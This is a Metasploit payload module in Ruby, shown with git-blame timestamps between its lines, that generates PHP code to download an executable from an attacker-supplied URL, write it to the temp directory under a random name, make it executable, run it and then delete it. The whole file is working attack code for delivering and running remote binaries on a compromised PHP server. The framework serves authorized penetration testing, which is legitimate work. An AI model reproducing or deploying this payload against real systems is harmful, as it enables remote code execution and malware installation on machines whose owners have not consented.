2009-07-26 23:08:31 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-07-26 23:08:31 +00:00
|
|
|
##
|
|
|
|
|
2009-07-28 15:23:52 +00:00
|
|
|
require 'msf/core/payload/php'
|
2009-07-26 23:08:31 +00:00
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
module MetasploitModule
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2015-03-09 20:44:14 +00:00
|
|
|
CachedSize = :dynamic
|
2015-03-09 20:31:04 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Php
|
|
|
|
include Msf::Payload::Single
|
2009-07-26 23:08:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'PHP Executable Download and Execute',
|
|
|
|
'Description' => 'Download an EXE from an HTTP URL and execute it',
|
|
|
|
'Author' => [ 'egypt' ],
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Privileged' => false
|
|
|
|
))
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# EXITFUNC is not supported :/
|
|
|
|
deregister_options('EXITFUNC')
|
2009-07-26 23:08:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Register command execution options
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-07-26 23:08:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def php_exec_file
|
|
|
|
exename = Rex::Text.rand_text_alpha(rand(8) + 4)
|
|
|
|
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
|
|
|
shell = <<-END_OF_PHP_CODE
|
2017-02-02 23:57:03 +00:00
|
|
|
#{php_preamble(disabled_varname: dis)}
|
2013-08-30 21:28:54 +00:00
|
|
|
if (!function_exists('sys_get_temp_dir')) {
|
|
|
|
function sys_get_temp_dir() {
|
|
|
|
if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
|
|
|
|
if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
|
|
|
|
if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
|
|
|
|
$tempfile=tempnam(uniqid(rand(),TRUE),'');
|
|
|
|
if (file_exists($tempfile)) {
|
|
|
|
@unlink($tempfile);
|
|
|
|
return realpath(dirname($tempfile));
|
|
|
|
}
|
|
|
|
return null;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
|
|
|
|
$fd_in = fopen("#{datastore['URL']}", "rb");
|
2017-02-03 01:07:58 +00:00
|
|
|
if ($fd_in === false) { die(); }
|
2013-08-30 21:28:54 +00:00
|
|
|
$fd_out = fopen($fname, "wb");
|
2017-02-03 01:07:58 +00:00
|
|
|
if ($fd_out === false) { die(); }
|
2013-08-30 21:28:54 +00:00
|
|
|
while (!feof($fd_in)) {
|
|
|
|
fwrite($fd_out, fread($fd_in, 8192));
|
|
|
|
}
|
|
|
|
fclose($fd_in);
|
|
|
|
fclose($fd_out);
|
|
|
|
chmod($fname, 0777);
|
|
|
|
$c = $fname;
|
2017-02-02 23:57:03 +00:00
|
|
|
#{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}
|
2013-08-30 21:28:54 +00:00
|
|
|
@unlink($fname);
|
|
|
|
END_OF_PHP_CODE
|
2009-07-26 23:08:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#return Rex::Text.compress(shell)
|
|
|
|
return shell
|
|
|
|
end
|
2009-07-26 23:08:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return php_exec_file
|
|
|
|
end
|
2009-07-26 23:08:31 +00:00
|
|
|
end
|